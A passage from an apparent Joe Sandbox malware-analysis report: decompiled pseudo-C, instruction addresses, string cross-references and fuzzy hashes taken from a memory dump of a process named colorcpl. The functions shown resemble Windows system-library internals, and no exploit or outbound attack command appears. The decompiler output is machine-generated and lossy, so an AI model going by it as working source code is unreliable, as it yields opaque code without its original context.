								if(E043829F0() < 0 || _v124 != 0x44646441) {
									goto L42;
								} else {
									goto L38;
								}
							} else {
								_push(0);
								_v140 = _t185 - 4;
								_push( &_v140);
								_push(8);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E043829F0() < 0) {
									goto L42;
								}
								if(_v120 == 0x44646441) {
									L38:
									_t167 = 1;
									_v108 = _v108 & 0x00000000;
									_t203 = E0434A86F(_v104);
									if(_t203 != 0 &&  *_t203 >= 0x48) {
										_v96 = _t203;
										_v108 =  *_t203;
										_push( &_v100);
										_push(_t196);
										_push( &_v108);
										_push( &_v96);
										_push(0xffffffff);
										if(E04382EB0() >= 0) {
											_t203[0x10] = _t203[0x10] & 0x00000000;
											_t203[0x11] = _t203[0x11] & 0x00000000;
											_push( &_v100);
											_push(_v100);
											_push( &_v108);
											_push( &_v96);
											_push(0xffffffff);
											E04382EB0();
										}
									}
									goto L42;
								}
								_t186 = _v124;
								_t174 = _v12;
								_t59 = _t186 + 4; // 0x103
								if(_t59 > _t174) {
									L31:
									_t185 = _v112;
									goto L32;
								}
								_v140 = _t186;
								_push(0);
								_v136 = 0;
								_push( &_v140);
								_push(_t196);
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E043829F0() < 0) {
									goto L42;
								}
								if(_v124 == 0x44646441) {
									goto L38;
								}
								_t174 = _v12;
								goto L31;
							}
						}
					}
					_t170 =  *((intOrPtr*)(_t171 + 0xa8)) + _t183;
					_t197 = 0x1c;
					_t198 = _t109 / _t197;
					if(_t198 == 0) {
						L14:
						_t167 = _v141;
						goto L15;
					}
					_t164 = _t170 + 0x18;
					do {
						if( *((intOrPtr*)(_t164 - 8)) != 0) {
							_t190 =  *_t164 +  *((intOrPtr*)(_t164 - 8));
							if(_t190 > _t200) {
								_t200 = _t190;
							}
						}
						_t164 = _t164 + 0x1c;
						_t198 = _t198 - 1;
					} while (_t198 != 0);
					goto L14;
				} else {
					_t165 = _t108 + __ecx;
					do {
						if( *((intOrPtr*)(_t165 - 4)) != 0) {
							_t192 =  *_t165 +  *((intOrPtr*)(_t165 - 4));
							if(_t192 > _t200) {
								_t200 = _t192;
							}
						}
						_t165 = _t165 + 0x28;
						_t194 = _t194 - 1;
					} while (_t194 != 0);
					_t183 = _v104;
					goto L7;
				}
			}

0x043c174b
0x043c1762
0x043c1765
0x043c176b
0x043c176d
0x043c1771
0x043c1774
0x043c1778
0x043c177e
0x043c179f
0x043c179f
0x043c17a7
0x043c17de
0x043c17de
0x043c17e6
0x043c17ee
0x043c17f2
0x043c17f4
0x043c17f4
0x043c17f2
0x043c17f6
0x043c17f8
0x043c17fe
0x043c17ff
0x043c1801
0x043c180a
0x043c1a8a
0x043c1a92
0x043c1810
0x043c1810
0x043c181d
0x00000000
0x00000000
0x043c182c
0x043c1831
0x043c183b
0x00000000
0x00000000
0x043c1841
0x043c184a
0x043c184f
0x043c1854
0x043c1856
0x043c185e
0x043c1860
0x043c1865
0x043c186d
0x043c186e
0x043c1877
0x043c187f
0x043c1887
0x043c1a75
0x043c1a85
0x00000000
0x043c1a85
0x043c1896
0x043c189a
0x043c189e
0x043c18a6
0x043c18a9
0x043c18aa
0x043c18af
0x043c18b4
0x043c18b5
0x043c18b6
0x043c18b7
0x043c18b8
0x043c18c3
0x043c1a6c
0x043c1a6c
0x043c1a70
0x00000000
0x043c1a70
0x043c18c9
0x043c18d2
0x043c18db
0x043c197f
0x043c1984
0x00000000
0x00000000
0x043c1993
0x043c1999
0x043c199a
0x043c199b
0x043c19a1
0x043c19a5
0x043c19aa
0x043c19ab
0x043c19ac
0x043c19ad
0x043c19ae
0x043c19b9
0x00000000
0x00000000
0x043c19c3
0x00000000
0x00000000
0x043c19c5
0x043c19c9
0x043c19d3
0x00000000
0x00000000
0x043c19d9
0x043c19e3
0x043c19e4
0x043c19e5
0x043c19ea
0x043c19ee
0x043c19f3
0x043c19f4
0x043c19f5
0x043c19f6
0x043c19f7
0x043c1a02
0x00000000
0x00000000
0x00000000
0x00000000
0x043c18ec
0x043c18f1
0x043c18f2
0x043c18fa
0x043c18fb
0x043c1901
0x043c1905
0x043c190a
0x043c190b
0x043c190c
0x043c190d
0x043c190e
0x043c1919
0x00000000
0x00000000
0x043c1923
0x043c1a0a
0x043c1a0e
0x043c1a10
0x043c1a1a
0x043c1a1e
0x043c1a25
0x043c1a2b
0x043c1a33
0x043c1a34
0x043c1a39
0x043c1a3e
0x043c1a3f
0x043c1a48
0x043c1a4a
0x043c1a52
0x043c1a56
0x043c1a57
0x043c1a5f
0x043c1a64
0x043c1a65
0x043c1a67
0x043c1a67
0x043c1a48
0x00000000
0x043c1a1e
0x043c1929
0x043c192d
0x043c1934
0x043c1939
0x043c197b
0x043c197b
0x00000000
0x043c197b
0x043c193d
0x043c1941
0x043c1946
0x043c194a
0x043c194b
0x043c1950
0x043c1955
0x043c1956
0x043c1957
0x043c1958
0x043c1959
0x043c1964
0x00000000
0x00000000
0x043c196e
0x00000000
0x00000000
0x043c1974
0x00000000
0x043c1974
0x043c18db
0x043c180a
0x043c17af
0x043c17b5
0x043c17b8
0x043c17bc
0x043c17da
0x043c17da
0x00000000
0x043c17da
0x043c17be
0x043c17c1
0x043c17c5
0x043c17c9
0x043c17ce
0x043c17d0
0x043c17d0
0x043c17ce
0x043c17d2
0x043c17d5
0x043c17d5
0x00000000
0x043c1780
0x043c1780
0x043c1782
0x043c1786
0x043c178a
0x043c178f
0x043c1791
0x043c1791
0x043c178f
0x043c1793
0x043c1796
0x043c1796
0x043c179b
0x00000000
0x043c179b

Strings

@, xrefs: 043C1877
AddD, xrefs: 043C18CD

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: @$AddD
API String ID: 0-2525844869
Opcode ID: e2aa41e05f2ffab9ce509ca44ac41cab20a9ea957ddfda5387ea6a1afbf064a1
Instruction ID: b76f0d9dd4403ac9f40d4b5ee3a43ab897454ab3501c6574500ded984ee05ce0
Opcode Fuzzy Hash: e2aa41e05f2ffab9ce509ca44ac41cab20a9ea957ddfda5387ea6a1afbf064a1
Instruction Fuzzy Hash: E2A16876218304AFE724CF14C844BABB7E9FF84714F145A2EF99586251E7B0F905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0441B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 0441B5C4
RedirectedKey, xrefs: 0441B60E

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: 8b48fd0babec322170d19ccbb78c0c5d93e3c2df814c0230b8ae23ef0f974980
Instruction ID: b5f7c51e9e35c1566e295da7050684d57d6ef45a6cc4d45c675e0f368b4a8846
Opcode Fuzzy Hash: 8b48fd0babec322170d19ccbb78c0c5d93e3c2df814c0230b8ae23ef0f974980
Instruction Fuzzy Hash: 0A6116B5C00259EFDF21DF94C948ADEBBB8FF08714F14446AE805A7220D734AA45DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0435F640 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0435F640(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t96;
				signed int _t99;
				signed int _t109;
				signed int _t114;
				signed int _t117;
				void* _t120;
				intOrPtr _t123;
				signed int _t128;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t137;
				void* _t139;
				void* _t141;

				_push(0x78);
				_push(0x441c3a0);
				E04397BE4(__ebx, __edi, __esi);
				_t137 =  *[fs:0x18];
				 *((intOrPtr*)(_t139 - 0x24)) = _t137;
				_t74 =  *[fs:0x30];
				 *((intOrPtr*)(_t139 - 0x2c)) =  *[fs:0x30];
				_t128 =  *(_t137 + 0xfb4);
				 *(_t139 - 0x20) = _t128;
				if(_t128 != 0) {
					_push(1);
					_t121 = _t128;
					E04344779(_t74, _t128);
				}
				if(( *( *[fs:0x18] + 0xfca) & 0x00000008) != 0) {
					_t76 =  *[fs:0x18];
					__eflags =  *(_t76 + 0xfca) & 0x00000020;
					if(( *(_t76 + 0xfca) & 0x00000020) == 0) {
						L26:
						_t109 = 0;
						L19:
						__eflags = _t128;
						if(_t128 != 0) {
							 *(_t137 + 0xfb4) = _t109;
							_push(2);
							_t121 = _t128;
							E04344779(_t76, _t128);
						}
						_t129 =  *(_t137 + 0xf94);
						__eflags = _t129;
						if(_t129 != 0) {
							 *(_t137 + 0xf94) = _t109;
							E0434FED0(0x4435b40);
							_push(0x4435b40);
							E0434E740(_t111);
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109, _t129);
						}
						__eflags =  *(_t137 + 0xfca) & 0x00000004;
						if(( *(_t137 + 0xfca) & 0x00000004) != 0) {
							 *(_t137 + 0x10) = _t109;
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109,  *(_t137 + 0x10));
						}
						E04374940();
						_t85 = 0x400;
						__eflags =  *(_t137 + 0xfca) & 0x00000400;
						if(( *(_t137 + 0xfca) & 0x00000400) != 0) {
							__eflags =  *0x44365f4 - 3;
							if( *0x44365f4 == 3) {
								_t85 = E04414080(_t111, _t121);
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0x10));
						return _t85;
					}
				}
				_t76 = 0x2000;
				if(( *(_t137 + 0xfca) & 0x00002000) != 0) {
					goto L26;
				}
				_t111 = 0x1000;
				_t109 = 0;
				if(( *( *[fs:0x18] + 0xfca) & 0x00001000) != 0) {
					 *((char*)(_t139 - 0x19)) = 1;
				} else {
					 *((char*)(_t139 - 0x19)) = 0;
					_t111 = 0;
					E043619DF(0);
				}
				E04362755(_t121);
				 *(_t139 - 4) = _t109;
				_t89 =  *0x4435da0; // 0x271a3c0
				while(_t89 != 0x4435d9c) {
					_t16 = _t89 - 0x10; // 0x271a3b0
					_t123 = _t16;
					 *((intOrPtr*)(_t139 - 0x30)) = _t123;
					_t18 = _t89 + 4; // 0x2713068
					_t96 =  *_t18;
					 *((intOrPtr*)(_t139 - 0x28)) = _t96;
					 *((intOrPtr*)(_t139 - 0x38)) = _t96;
					_t21 = _t123 + 0x34; // 0x1008a2cc
					_t111 =  *_t21;
					_t24 = _t123 + 0x18; // 0x6f8a0000
					if( *((intOrPtr*)( *((intOrPtr*)(_t139 - 0x2c)) + 8)) !=  *_t24 && (_t111 & 0x00040000) == 0) {
						_t27 = _t123 + 0x1c; // 0x6f9254e0
						_t99 =  *_t27;
						 *(_t139 - 0x34) = _t99;
						if(_t99 != 0 && _t111 == 0x80004) {
							 *(_t139 - 0x3c) = _t99;
							 *((intOrPtr*)(_t139 - 0x60)) = 0x24;
							 *(_t139 - 0x5c) = 1;
							_t117 = 7;
							memset(_t139 - 0x58, 0, _t117 << 2);
							_t141 = _t141 + 0xc;
							_t34 = _t123 + 0x48; // 0x0
							E0435DC40(_t139 - 0x60,  *_t34);
							 *(_t139 - 4) = 1;
							_t135 =  *((intOrPtr*)(_t139 - 0x30));
							_t155 =  *((intOrPtr*)(_t135 + 0x3a)) - _t109;
							if( *((intOrPtr*)(_t135 + 0x3a)) != _t109) {
								_t120 = 3;
								E0435F0A3(_t109, _t120, _t135, _t135, _t137, _t155);
							}
							_push(_t109);
							_push(3);
							_t111 =  *(_t139 - 0x34);
							E0435DCD1(_t109,  *(_t139 - 0x34),  *((intOrPtr*)(_t135 + 0x18)), _t135, _t137, _t155);
							 *(_t139 - 4) = _t109;
							_t128 =  *(_t139 - 0x20);
							E0435F85E();
						}
					}
					_t89 =  *((intOrPtr*)(_t139 - 0x28));
				}
				_t121 =  *0x4435b24; // 0x2711e28
				__eflags =  *((intOrPtr*)(_t121 + 0x3a)) - _t109;
				if( *((intOrPtr*)(_t121 + 0x3a)) != _t109) {
					 *((intOrPtr*)(_t139 - 0x84)) = 0x24;
					 *(_t139 - 0x80) = 1;
					_t114 = 7;
					__eflags = 0;
					memset(_t139 - 0x7c, 0, _t114 << 2);
					_t49 = _t121 + 0x48; // 0x0
					E0435DC40(_t139 - 0x84,  *_t49);
					 *(_t139 - 4) = 2;
					_t121 =  *0x4435b24; // 0x2711e28
					_t111 = 3;
					E0435F0A3(_t109, _t111, _t121, _t139 - 0x7c + _t114, _t137, __eflags);
					 *(_t139 - 4) = _t109;
					_t128 =  *(_t139 - 0x20);
					E0435F87D();
				}
				 *(_t139 - 4) = 0xfffffffe;
				E0435F867(_t109, _t111);
				_t76 = E04376540(_t111);
				goto L19;
			}

0x0435f640
0x0435f642
0x0435f647
0x0435f64c
0x0435f653
0x0435f656
0x0435f65c
0x0435f65f
0x0435f665
0x0435f66a
0x0435f66c
0x0435f66e
0x0435f670
0x0435f670
0x0435f682
0x043a9c28
0x043a9c2e
0x043a9c35
0x0435f857
0x0435f857
0x0435f7da
0x0435f7da
0x0435f7dc
0x0435f7de
0x0435f7e4
0x0435f7e6
0x0435f7e8
0x0435f7e8
0x0435f7ed
0x0435f7f3
0x0435f7f5
0x0435f82b
0x0435f836
0x0435f83b
0x0435f840
0x0435f850
0x0435f850
0x0435f7f7
0x0435f7fe
0x043a9c79
0x043a9c87
0x043a9c87
0x0435f804
0x0435f809
0x0435f80e
0x0435f815
0x043a9c91
0x043a9c98
0x043a9c9e
0x043a9c9e
0x043a9c98
0x0435f81e
0x0435f82a
0x0435f82a
0x043a9c3b
0x0435f688
0x0435f694
0x00000000
0x00000000
0x0435f6a0
0x0435f6a5
0x0435f6ae
0x043a9c40
0x0435f6b4
0x0435f6b4
0x0435f6b7
0x0435f6b9
0x0435f6b9
0x0435f6be
0x0435f6c3
0x0435f6c6
0x0435f6cb
0x0435f6d6
0x0435f6d6
0x0435f6d9
0x0435f6dc
0x0435f6dc
0x0435f6df
0x0435f6e2
0x0435f6e5
0x0435f6e5
0x0435f6ee
0x0435f6f1
0x0435f6fb
0x0435f6fb
0x0435f6fe
0x0435f703
0x0435f713
0x0435f716
0x0435f71d
0x0435f726
0x0435f72c
0x0435f72c
0x0435f72e
0x0435f734
0x0435f739
0x0435f740
0x0435f743
0x0435f747
0x0435f74d
0x0435f74e
0x0435f74e
0x0435f753
0x0435f754
0x0435f759
0x0435f75c
0x0435f761
0x0435f764
0x0435f767
0x0435f767
0x0435f703
0x0435f76c
0x0435f76c
0x0435f774
0x0435f77a
0x0435f77e
0x0435f780
0x0435f78a
0x0435f793
0x0435f794
0x0435f799
0x0435f79b
0x0435f7a4
0x0435f7a9
0x0435f7b0
0x0435f7b8
0x0435f7b9
0x0435f7be
0x0435f7c1
0x0435f7c4
0x0435f7c4
0x0435f7c9
0x0435f7d0
0x0435f7d5
0x00000000

Strings

$, xrefs: 0435F716
$, xrefs: 0435F780

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: $$$
API String ID: 0-233714265
Opcode ID: f4750328cfe9f134c3f900427e57fbb509bd3aeff26c99d01a62f84af8cc3c93
Instruction ID: 9328792a90a601da861389e88f1a5c80c19d69bdbf1157e00c7d8e55f42cc5a8
Opcode Fuzzy Hash: f4750328cfe9f134c3f900427e57fbb509bd3aeff26c99d01a62f84af8cc3c93
Instruction Fuzzy Hash: 0661CE71A00B4ADBEB20EFA4C580FADB7F1FF44708F145469D905AB6A0DB74B940DB80

Uniqueness

Uniqueness Score: -1.00%

Function 04340485 Relevance: 2.6, Strings: 2, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E04340485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x4436630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E043482E0(0xabababab, 0, "kLsE", 0);
					 *0x4436630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E04365C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E04340670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E04340670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E04340630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E04385050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E04383EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E04340690) {
					 *0x44391e0();
					_t50 =  *_t73();
				} else {
					_t50 = E04340690();
				}
				_t84 = _t50;
				goto L4;
			}

0x0434048f
0x04340493
0x0434049a
0x043404a0
0x043404a3
0x043404a6
0x043404af
0x043404b8
0x043404c2
0x043404cb
0x043404ce
0x043404d2
0x043404d6
0x0434060e
0x04340610
0x04340618
0x00000000
0x00000000
0x043404ef
0x043404ef
0x043404f2
0x043405e3
0x043405ea
0x043405f1
0x043405f1
0x04340501
0x04340501
0x04340504
0x0434050c
0x04340519
0x0434051b
0x00000000
0x0439e99c
0x0439e9a2
0x0439e9ac
0x0434051f
0x0434052a
0x0439e9b9
0x043405cd
0x043405d3
0x043405d3
0x0439e9bf
0x0434053c
0x0434054d
0x04340559
0x04340562
0x0439e9ce
0x0439e9ce
0x0434056a
0x0434057b
0x04340580
0x04340580
0x0434058f
0x04340597
0x04340598
0x0434059d
0x043405a1
0x043405a5
0x043405ad
0x043405b3
0x0439e9dd
0x00000000
0x0439e9ed
0x00000000
0x0439e9ed
0x0439e9dd
0x043405b9
0x043405be
0x043405c7
0x0439e9f2
0x0439e9f2
0x043405c7
0x00000000
0x043405ad
0x00000000
0x0439e9b2
0x0434050c
0x043404fb
0x0439e989
0x0439e990
0x00000000
0x0439e990
0x00000000
0x043404fb
0x043404dc
0x043404e2
0x043405d6
0x043405dc
0x043404e8
0x043404e8
0x043404e8
0x043404ed
0x00000000

Strings

kLsE, xrefs: 043405FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 04340586

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: f89c512a065764c473a47b6d51377b41b364044201ea076f3d1e515f75a2cfa5
Instruction ID: 36dddccf3c3be9a6ab9f16102514e4f2c0bbe690095d6aa0350a1e04027de670
Opcode Fuzzy Hash: f89c512a065764c473a47b6d51377b41b364044201ea076f3d1e515f75a2cfa5
Instruction Fuzzy Hash: EC519E71B047069FEB28DFA4C4406EAB7F8EF85304F10947ED69697640E674B905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0434A1E3 Relevance: 2.6, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0434A1E3(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				short _v22;
				char _v24;
				char* _v28;
				short _v30;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t34;
				short _t35;
				signed int* _t37;
				signed char* _t38;
				signed int _t39;
				signed char* _t40;
				intOrPtr* _t43;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t49;
				signed int _t53;
				signed char* _t58;
				short _t61;
				intOrPtr* _t63;
				intOrPtr _t68;
				signed int _t71;
				signed int _t72;

				_v16 = __edx;
				_t72 = 0;
				_t68 = __ecx;
				_v8 = 0;
				_t61 = 0x42;
				_t34 = 0x44;
				_v22 = _t34;
				_t58 = 0x7ffe0385;
				_t35 = 0x40;
				_v32 = _t35;
				_v12 = __ecx;
				_v24 = _t61;
				_v20 = L"RtlpResUltimateFallbackInfo Enter";
				_t37 =  *( *[fs:0x30] + 0x50);
				_v30 = _t61;
				_v28 = L"RtlpResUltimateFallbackInfo Exit";
				if(_t37 != 0) {
					__eflags =  *_t37;
					if(__eflags == 0) {
						goto L1;
					}
					_t38 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					_t73 = 0x7ffe0384;
					if(( *_t38 & 0x00000001) != 0) {
						_t39 = E04353C40();
						__eflags = _t39;
						if(_t39 == 0) {
							_t40 = 0x7ffe0384;
						} else {
							_t40 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E043CFC01( &_v24,  *_t40 & 0x000000ff);
						_t68 = _v12;
					}
					if(_t68 == 0) {
						L28:
						return 0xc000000d;
					} else {
						_t43 = _a4;
						if(_t43 == 0) {
							goto L28;
						}
						_t63 = _a8;
						_t79 = _t63;
						if(_t63 == 0) {
							goto L28;
						}
						 *_t43 = _t72;
						 *_t63 = _t72;
						_t45 = E0434B5E0(_t58, _t72, _t73, _t79, _t68, _v16,  &_v8, _a12, 1);
						if(_t45 >= 0) {
							_t46 = _v8;
							__eflags = _t46;
							if(_t46 == 0) {
								L17:
								_t72 = 0xc0000001;
								L14:
								_t47 = E04353C40();
								__eflags = _t47;
								if(_t47 != 0) {
									_t58 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
								}
								__eflags =  *_t58 & 0x00000001;
								if(( *_t58 & 0x00000001) != 0) {
									_t49 = E04353C40();
									__eflags = _t49;
									if(_t49 != 0) {
										_t73 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
									E043CFC01( &_v32,  *_t73 & 0x000000ff);
									goto L16;
								} else {
									L16:
									return _t72;
								}
							}
							__eflags = _t46 - 0xffffffff;
							if(_t46 == 0xffffffff) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x7c)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x7c)) == _t72) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x80)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x80)) == _t72) {
								goto L17;
							}
							_t71 =  *(_t46 + 0x18);
							__eflags = _t71;
							if(_t71 == 0) {
								goto L17;
							}
							_t53 = _t46 +  *((intOrPtr*)(_t46 + 0x7c));
							__eflags = _t53;
							 *_a8 = _t71;
							 *_a4 = _t53;
							goto L14;
						}
						return _t45;
					}
				}
				L1:
				_t38 = _t58;
				goto L2;
			}

0x0434a1f0
0x0434a1f3
0x0434a1f5
0x0434a1f7
0x0434a1fa
0x0434a1fd
0x0434a1fe
0x0434a202
0x0434a209
0x0434a20a
0x0434a214
0x0434a217
0x0434a21b
0x0434a222
0x0434a225
0x0434a229
0x0434a232
0x043a2965
0x043a2967
0x00000000
0x00000000
0x043a2976
0x0434a23a
0x0434a23d
0x0434a242
0x043a2980
0x043a2985
0x043a2987
0x043a2999
0x043a2989
0x043a2992
0x043a2992
0x043a29a1
0x043a29a6
0x043a29a6
0x0434a24a
0x043a29ea
0x00000000
0x0434a250
0x0434a250
0x0434a255
0x00000000
0x00000000
0x0434a25b
0x0434a25e
0x0434a260
0x00000000
0x00000000
0x0434a26b
0x0434a274
0x0434a277
0x0434a27e
0x0434a287
0x0434a28a
0x0434a28c
0x0434a2ce
0x0434a2ce
0x0434a2b4
0x0434a2b4
0x0434a2b9
0x0434a2bb
0x043a29b7
0x043a29b7
0x0434a2c1
0x0434a2c4
0x043a29c2
0x043a29c7
0x043a29c9
0x043a29d4
0x043a29d4
0x043a29d4
0x043a29e0
0x00000000
0x0434a2ca
0x0434a2ca
0x00000000
0x0434a2ca
0x0434a2c4
0x0434a28e
0x0434a291
0x00000000
0x00000000
0x0434a293
0x0434a296
0x00000000
0x00000000
0x0434a298
0x0434a29e
0x00000000
0x00000000
0x0434a2a0
0x0434a2a3
0x0434a2a5
0x00000000
0x00000000
0x0434a2aa
0x0434a2aa
0x0434a2ad
0x0434a2b2
0x00000000
0x0434a2b2
0x0434a284
0x0434a284
0x0434a24a
0x0434a238
0x0434a238
0x00000000

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 0434A21B
RtlpResUltimateFallbackInfo Exit, xrefs: 0434A229

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 9612843d172ff7f3582b65f58eab519422e25e497cf61f9f33794f1e703a62e5
Instruction ID: 6d94285c180ac211e7c2d0dc2617064782602b5a81914618392632450097f93e
Opcode Fuzzy Hash: 9612843d172ff7f3582b65f58eab519422e25e497cf61f9f33794f1e703a62e5
Instruction Fuzzy Hash: 5341AF30780A44DBDB15DF69D440BAAB7F4EF85B04F1460A9EC05DBBA0E236F910DB10

Uniqueness

Uniqueness Score: -1.00%

Function 043C0443 Relevance: 2.6, Strings: 2, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E043C0443(signed int __ecx, char _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v16;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v116;
				signed int _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				intOrPtr _v144;
				unsigned short _v152;
				void* _v156;
				void* _v160;
				void* _v172;
				void* _v176;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				intOrPtr _t68;
				void* _t69;
				void* _t71;
				signed int _t74;
				char _t76;
				void* _t77;
				signed int _t79;
				signed int _t80;
				void* _t81;
				signed int _t83;
				signed int _t85;

